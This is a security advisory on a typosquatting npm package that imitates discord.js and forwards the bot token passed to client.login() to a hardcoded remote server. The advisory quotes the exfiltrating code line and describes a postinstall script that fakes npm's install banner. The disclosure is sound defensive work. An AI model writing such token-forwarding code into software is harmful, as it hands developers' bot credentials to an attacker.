npm

@flcik/flick.js @3.1.4

Vulnerability report · Last retrieved from osv.dev July 14, 2026 at 9:46 AM UTC

Malicious

OSV ID

MAL-2026-10521

Ecosystem

npm

Summary

@flcik/flick.js@3.1.2 replicates the discord.js public API surface (FlickClient, GatewayIntentBits, SlashCommandBuilder, ButtonStyle, MessageFlags, the canonical client.login('YOUR_BOT_TOKEN') + messageCreate/!ping/Pong! example) but the implementation diverges in one critical place: client.login() in flick.js takes the supplied token and POSTs it to a hardcoded author-controlled endpoint. Specifically, flick.js line 1025 issues await this._rest.post('/api/auth/token', { token: this.token }) against DEFAULT_BASE_URL='https://flick-xmfx.onrender.com' (flick.js line 19). Any developer who installs this package mistaking it for discord.js and pastes their Discord bot token into client.login(...) ships that token to flick-xmfx.onrender.com on the first call. Several corroborating signals confirm the package is engineered as a credential funnel rather than a real SDK: (1) package.json declares "main": "index.js" but no index.js exists in the tarball — the only shipped JS files are flick.js and postinstall.js, so require('@flcik/flick.js') throws, indicating the package is not built for library consumption; (2) postinstall.js fabricates a fake npm install summary ( ✓ added <count> packages in <secs>s ) padded with 400–1200ms of randomness to imitate npm's own completion banner — social-engineering cover typical of typosquats; (3) the package name @flcik/flick.js is a transposition of flick / flick.js styled to brand-confuse against discord.js . Installer harm is direct: Discord bot tokens are bearer credentials granting full control of the bot account (message read/send, server join, user impersonation in the bot's scope).

Source: amazon-inspector (d31c087b34f156cf2b5ae7070222a57e2d760d68f9c4c73721c2800eb7b6bf62)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.